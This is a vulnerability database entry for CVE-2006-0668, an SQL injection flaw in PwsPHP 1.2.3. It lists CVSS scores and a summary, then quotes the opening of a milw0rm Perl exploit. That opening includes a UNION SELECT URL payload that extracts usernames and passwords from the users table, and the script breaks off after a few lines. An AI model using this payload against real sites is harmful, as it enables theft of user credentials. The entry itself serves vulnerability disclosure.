7.5
CVSSv2

CVE-2006-0668

Published: 13/02/2006 Updated: 05/09/2008
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

SQL injection vulnerability in index.php in PwsPHP 1.2.3 allows remote malicious users to execute arbitrary SQL commands via the id parameter, possibly in message.php in the espace_membre module. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.

Vulnerable Product Search on Vulmon Subscribe to Product

pwsphp pwsphp 1.2.3

Exploits

#!/usr/bin/perl # # PwsPHP <= 124 (indexphp) Remote SQL Injection Exploit # examplecom/indexphp?mod=sondages&do=results&id=1%20union%20select%20id,0,0,pseudo,pass,pseudo,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20%60users%60%20/* # Discovered by: papipsycho (papipsychocom) (WOrlddefacersde) # ported by str0ke (milw0rmcom) use L ...